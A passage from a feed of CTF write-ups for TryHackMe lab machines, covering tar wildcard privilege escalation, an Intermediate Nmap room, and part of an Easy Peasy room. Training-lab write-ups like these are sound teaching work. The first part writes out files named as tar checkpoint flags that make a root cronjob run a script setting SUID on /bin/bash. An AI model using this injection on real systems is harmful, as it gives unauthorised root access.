&lt;p&gt;The &lt;code&gt;*&lt;/code&gt; wildcard is the key. &lt;code&gt;tar&lt;/code&gt; supports &lt;code&gt;--checkpoint&lt;/code&gt; flags that execute commands at intervals. By creating files named &lt;code&gt;--checkpoint=1&lt;/code&gt; and &lt;code&gt;--checkpoint-action=exec=[command]&lt;/code&gt; inside the backup directory, &lt;code&gt;tar&lt;/code&gt; interprets them as its own flags instead of files.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;Different explanation of tar wildcard injection &lt;a href="https://mqt.gitbook.io/oscp-notes/tar-wildcard-injection" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;A malicious &lt;code&gt;shell.sh&lt;/code&gt; was created with the following payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/bash&lt;/span&gt;

&lt;span class="nb"&gt;chmod&lt;/span&gt; +s /bin/bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Execute permission was added and checkpoint files were created:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;chmod&lt;/span&gt; +x shell.sh 
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="s2"&gt;"--checkpoint=1"&lt;/span&gt; 
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="s2"&gt;"--checkpoint-action=exec=bash shell.sh"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Final state of the backup directory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;andre@cmess:~/backup&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-al&lt;/span&gt;
total 24
drwxr-x--- 2 andre andre 4096 Jun 15 06:14 &lt;span class="nb"&gt;.&lt;/span&gt;
drwxr-x--- 5 andre andre 4096 Jun 15 06:12 ..
&lt;span class="nt"&gt;-rw-rw-r--&lt;/span&gt; 1 andre andre    1 Jun 15 06:14 &lt;span class="nt"&gt;--checkpoint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1
&lt;span class="nt"&gt;-rw-rw-r--&lt;/span&gt; 1 andre andre    1 Jun 15 06:14 &lt;span class="nt"&gt;--checkpoint-action&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;exec&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;bash shell.sh
&lt;span class="nt"&gt;-rwxr-x---&lt;/span&gt; 1 andre andre   51 Feb  9  2020 note
&lt;span class="nt"&gt;-rwxrwxr-x&lt;/span&gt; 1 andre andre   32 Jun 15 06:12 shell.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After the cronjob fired, &lt;code&gt;shell.sh&lt;/code&gt; was executed as root and SUID was set on &lt;code&gt;/bin/bash&lt;/code&gt;, allowing a root shell via &lt;code&gt;bash -p&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Flag located in &lt;code&gt;/root/root.txt&lt;/code&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
    <item>
      <title>Intermediate Nmap - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Sun, 14 Jun 2026 23:32:38 +0000</pubDate>
      <link>https://dev.to/laach_/intermediate-nmap-thm-45gh</link>
      <guid>https://dev.to/laach_/intermediate-nmap-thm-45gh</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Easy🟩&lt;br&gt;
Link: &lt;a href="https://tryhackme.com/room/intermediatenmap" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 20 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description: &lt;code&gt;Can you combine your great nmap skills with other tools to log in to this machine?&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Shell as Ubuntu
&lt;/h2&gt;

&lt;p&gt;Casual &lt;code&gt;nmap&lt;/code&gt; scan&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap 10.112.177.171 &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nt"&gt;-O&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Because this room is &lt;code&gt;Nmap&lt;/code&gt;-targeted, I'll break the command down and explain what each flag does.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;-Pn (Skips Ping Scan. Nmap by default uses ping to verify if host is alive) 
-sV (Checks version of running service) 
-sC (Runs default NSE scripts) 
-p- (Scans whole port range from 0-65535, TCP only as -sU is not provided) 
-T4 (Sets speed of scan to 4 out of 5. Colloquially it's aggressive scan) 
-n  (Does not perform DNS resolution)
-O  (Nmap tries to identify OS of target)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Nmap scan report for 10.112.177.171
Host is up (0.028s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7d:dc:eb:90:e4:af:33:d9:9f:0b:21:9a:fc:d5:77:f2 (RSA)
|   256 83:a7:4a:61:ef:93:a3:57:1a:57:38:5c:48:2a:eb:16 (ECDSA)
|_  256 30:bf:ef:94:08:86:07:00:f7:fc:df:e8:ed:fe:07:af (ED25519)
2222/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 1c:49:54:c5:b5:29:c6:ef:83:de:21:3a:b1:6f:2a:23 (RSA)
|   256 94:de:30:2c:fb:71:c2:77:d9:c6:05:58:0c:27:f2:8c (ECDSA)
|_  256 b0:d1:6b:99:15:ad:fd:71:bb:15:7c:5b:0a:3d:24:db (ED25519)
31337/tcp open  Elite?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     In case I forget - user:pass
|_    ubuntu:Dafdas!!/str0ng
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.99%I=7%D=6/15%Time=6A2F345E%P=x86_64-pc-linux-gnu%r(N
SF:ULL,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/st
SF:r0ng\n\n")%r(GetRequest,35,"In\x20case\x20I\x20forget\x20-\x20user:pass
SF:\nubuntu:Dafdas!!/str0ng\n\n")%r(SIPOptions,35,"In\x20case\x20I\x20forg
SF:et\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(GenericLines,35,"I
SF:n\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n"
SF:)%r(HTTPOptions,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu
SF::Dafdas!!/str0ng\n\n")%r(RTSPRequest,35,"In\x20case\x20I\x20forget\x20-
SF:\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(RPCCheck,35,"In\x20case\x
SF:20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(DNSVers
SF:ionBindReqTCP,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:D
SF:afdas!!/str0ng\n\n")%r(DNSStatusRequestTCP,35,"In\x20case\x20I\x20forge
SF:t\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(Help,35,"In\x20case
SF:\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(SSLSe
SF:ssionReq,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas
SF:!!/str0ng\n\n")%r(TerminalServerCookie,35,"In\x20case\x20I\x20forget\x2
SF:0-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(TLSSessionReq,35,"In\x2
SF:0case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(
SF:Kerberos,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas
SF:!!/str0ng\n\n")%r(SMBProgNeg,35,"In\x20case\x20I\x20forget\x20-\x20user
SF::pass\nubuntu:Dafdas!!/str0ng\n\n")%r(X11Probe,35,"In\x20case\x20I\x20f
SF:orget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(FourOhFourReque
SF:st,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str
SF:0ng\n\n")%r(LPDString,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\n
SF:ubuntu:Dafdas!!/str0ng\n\n")%r(LDAPSearchReq,35,"In\x20case\x20I\x20for
SF:get\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n")%r(LDAPBindReq,35,"I
SF:n\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n"
SF:)%r(LANDesk-RC,35,"In\x20case\x20I\x20forget\x20-\x20user:pass\nubuntu:
SF:Dafdas!!/str0ng\n\n")%r(TerminalServer,35,"In\x20case\x20I\x20forget\x2
SF:0-\x20user:pass\nubuntu:Dafdas!!/str0ng\n\n");
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.29 seconds
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Scan reveals:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22/tcp - SSH&lt;/li&gt;
&lt;li&gt;2222/tcp - SSH&lt;/li&gt;
&lt;li&gt;31337/tcp - ELITE?&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;A &lt;code&gt;?&lt;/code&gt; after a service name means Nmap is not 100% sure; the name shown is its best guess&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The scan also reveals a message returned by port 31337&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;In case I forget - user:pass
ubuntu:Dafdas!!/str0ng
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
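&lt;p&gt;The scan output above is also useful input for a defender. As an added example (not part of the original write-up), the following Python script parses nmap's normal output into a port table, records which service names carry the &lt;code&gt;?&lt;/code&gt; best-guess marker, and flags any unrecognised service whose probe responses contain credential-like words. The sample report is a trimmed copy of the scan above; the parser and the list of hint words are my own assumptions, not an nmap feature.&lt;/p&gt;

```python
import re

# Constructed sample: a trimmed copy of the nmap report shown above. The second
# ssh-hostkey block and the long SF: fingerprint dump are left out because the
# parser only needs the port table and the per-port script output.
SAMPLE_REPORT = """\
Nmap scan report for 10.112.177.171
Host is up (0.028s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7d:dc:eb:90:e4:af:33:d9:9f:0b:21:9a:fc:d5:77:f2 (RSA)
|_  256 30:bf:ef:94:08:86:07:00:f7:fc:df:e8:ed:fe:07:af (ED25519)
2222/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
31337/tcp open  Elite?
| fingerprint-strings:
|   GenericLines, GetRequest, NULL:
|     In case I forget - user:pass
|_    ubuntu:Dafdas!!/str0ng
1 service unrecognized despite returning data.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
SCRIPT_LINE = re.compile(r"^\|_?\s?(.*)$")      # NSE script output hangs off a port line
PROBE_LIST = re.compile(r"^[\w, -]+:$")         # e.g. "GetRequest, NULL:" or "ssh-hostkey:"
# Words that suggest a banner is handing out credentials (assumption: my own list).
SECRET_HINT = re.compile(r"(?i)\b(user|pass|password|passwd|login|token|secret)\b")


def parse_report(text):
    """Turn nmap's normal (-oN / stdout) output into a list of port dicts."""
    ports = []
    current = None
    for raw in text.splitlines():
        m = PORT_LINE.match(raw)
        if m:
            name = m.group(4)
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": name.rstrip("?"),
                "guessed": name.endswith("?"),    # the '?' means nmap is not sure
                "version": (m.group(5) or "").strip(),
                "scripts": [],
            }
            ports.append(current)
            continue
        m = SCRIPT_LINE.match(raw)
        if m and current is not None:
            current["scripts"].append(m.group(1).strip())
            continue
        current = None          # any other line ends the current port's block
    return ports


def fingerprint_banner(port):
    """Join the raw response lines of a fingerprint-strings block into one string.

    Probe-name lines (ending in ':') are skipped. Heuristic: every script line
    after 'fingerprint-strings:' is treated as part of the block.
    """
    lines = port["scripts"]
    if "fingerprint-strings:" not in lines:
        return ""
    start = lines.index("fingerprint-strings:") + 1
    data = [ln for ln in lines[start:] if not PROBE_LIST.match(ln)]
    return "\n".join(data)


def leaked_secret_banners(ports):
    """Return (port, banner) for open ports whose banner contains credential-like words."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        banner = fingerprint_banner(p)
        if banner and SECRET_HINT.search(banner):
            findings.append((p["port"], banner))
    return findings


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_REPORT)
    for p in parsed:
        tag = " (best guess)" if p["guessed"] else ""
        print(p["port"], p["proto"], p["state"], p["service"] + tag, p["version"])
    for port, banner in leaked_secret_banners(parsed):
        print("credential-like text served on port", port, ":", banner.replace("\n", " / "))
```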



&lt;p&gt;The credentials were used to authenticate via SSH on port 22. After logging in, the current directory was &lt;code&gt;/home/ubuntu&lt;/code&gt;, which contained nothing of interest.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-al&lt;/span&gt;
total 28
drwxr-xr-x 1 ubuntu ubuntu 4096 Jun 14 22:39 &lt;span class="nb"&gt;.&lt;/span&gt;
drwxr-xr-x 1 root   root   4096 Mar  2  2022 ..
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 ubuntu ubuntu  220 Feb 25  2020 .bash_logout
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 ubuntu ubuntu 3771 Feb 25  2020 .bashrc
drwx------ 2 ubuntu ubuntu 4096 Jun 14 22:39 .cache
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt; 1 ubuntu ubuntu  807 Feb 25  2020 .profile

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;/home&lt;/code&gt; directory was checked for other users.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ls /home
ubuntu  user
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The flag was found in the &lt;code&gt;user&lt;/code&gt; home directory.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ cat flag.txt
flag{REDACTED}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>cybersecurity</category>
      <category>linux</category>
      <category>ctf</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Easy Peasy - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Sat, 13 Jun 2026 01:46:11 +0000</pubDate>
      <link>https://dev.to/laach_/easy-peasy-thm-3fho</link>
      <guid>https://dev.to/laach_/easy-peasy-thm-3fho</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Easy🟩&lt;br&gt;
Link: &lt;a href="https://tryhackme.com/room/easypeasyctf" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 45 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description: &lt;code&gt;Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Task 1
&lt;/h2&gt;

&lt;p&gt;Enumeration starts with &lt;code&gt;nmap&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; scan.txt 10.113.130.85
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8oeslxdyosr96xqpzmxg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8oeslxdyosr96xqpzmxg.png" alt="nmap" width="800" height="532"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Three ports are open:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;80/tcp - HTTP&lt;/li&gt;
&lt;li&gt;6498/tcp - SSH&lt;/li&gt;
&lt;li&gt;65524/tcp - HTTP&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Question 1
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;How many ports are open?&lt;/code&gt; Answer: &lt;code&gt;3&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 2
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is the version of nginx?&lt;/code&gt; Answer: &lt;code&gt;1.16.1&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 3
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is running on the highest port?&lt;/code&gt; Answer: &lt;code&gt;Apache&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Task 2
&lt;/h2&gt;

&lt;p&gt;Port 80 serves the nginx default page.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpglzasc57wl99izievum.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpglzasc57wl99izievum.png" alt="nginx" width="692" height="247"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;&lt;code&gt;Feroxbuster&lt;/code&gt; was used instead of &lt;code&gt;gobuster&lt;/code&gt;, but both commands are provided.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Running:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;feroxbuster &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'http://[IP]'&lt;/span&gt; &lt;span class="nt"&gt;--wordlist&lt;/span&gt; /usr/share/dirb/wordlists/common.txt 
&lt;span class="c"&gt;# or &lt;/span&gt;
gobuster &lt;span class="nb"&gt;dir&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="s1"&gt;'http://[IP]'&lt;/span&gt; &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/dirb/wordlists/common.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F41bu671roi5zik9hi5w7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F41bu671roi5zik9hi5w7.png" alt="feroxbuster" width="798" height="118"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The scan reveals &lt;code&gt;robots.txt&lt;/code&gt;, but it contains nothing useful. There is also &lt;code&gt;hidden/&lt;/code&gt;, which displays a creepy image; its source code reveals nothing. Ferox also finds &lt;code&gt;hidden/whatever/&lt;/code&gt;, which shows a mountain landscape. That page's source contains a paragraph with a &lt;code&gt;hidden&lt;/code&gt; attribute.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;head&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;title&amp;gt;&lt;/span&gt;dead end&lt;span class="nt"&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;style&amp;gt;&lt;/span&gt;
            &lt;span class="nt"&gt;body&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nl"&gt;background-image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sx"&gt;url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg")&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nl"&gt;background-repeat&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;no-repeat&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nl"&gt;background-size&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;cover&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nl"&gt;width&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="m"&gt;35em&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nl"&gt;margin&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; &lt;span class="nb"&gt;auto&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nl"&gt;font-family&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Tahoma&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Verdana&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Arial&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;sans-serif&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;/style&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;center&amp;gt;&lt;/span&gt;
            &lt;span class="nt"&gt;&amp;lt;p&lt;/span&gt; &lt;span class="na"&gt;hidden&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;ZmxhZ3tmMXJzN19mbDRnfQ==&lt;span class="nt"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
        &lt;span class="nt"&gt;&amp;lt;/center&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Decoding it with &lt;a href="https://gchq.github.io/CyberChef/" rel="noopener noreferrer"&gt;CyberChef&lt;/a&gt; gives &lt;code&gt;flag{REDACTED}&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Port 65524 shows the Apache default page. Source code contains another hidden paragraph.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;p&lt;/span&gt; &lt;span class="na"&gt;hidden&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu&lt;span class="nt"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The hint suggests Base encoding. Trying all Base variants in &lt;a href="https://gchq.github.io/CyberChef/" rel="noopener noreferrer"&gt;CyberChef&lt;/a&gt; shows that only Base62 produces readable output. It decodes to &lt;code&gt;/n0th1ng3ls3m4tt3r&lt;/code&gt;. On the same page, another flag is embedded in the Apache page HTML.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="nt"&gt;&amp;lt;li&amp;gt;&lt;/span&gt;
    They are activated by symlinking available
    configuration files from their respective
    Fl4g 3 : flag{REDACTED}
    *-available/ counterparts. These should be managed
    by using our helpers
    &lt;span class="nt"&gt;&amp;lt;tt&amp;gt;&lt;/span&gt;
        a2enmod,
        a2dismod,
    &lt;span class="nt"&gt;&amp;lt;/tt&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;tt&amp;gt;&lt;/span&gt;
        a2ensite,
        a2dissite,
    &lt;span class="nt"&gt;&amp;lt;/tt&amp;gt;&lt;/span&gt;
    and
    &lt;span class="nt"&gt;&amp;lt;tt&amp;gt;&lt;/span&gt;
        a2enconf,
        a2disconf
    &lt;span class="nt"&gt;&amp;lt;/tt&amp;gt;&lt;/span&gt;. See their respective man pages for detailed information.
&lt;span class="nt"&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Visiting &lt;code&gt;/n0th1ng3ls3m4tt3r&lt;/code&gt; shows a page with a 'matrix' image and a hash.&lt;/p&gt;

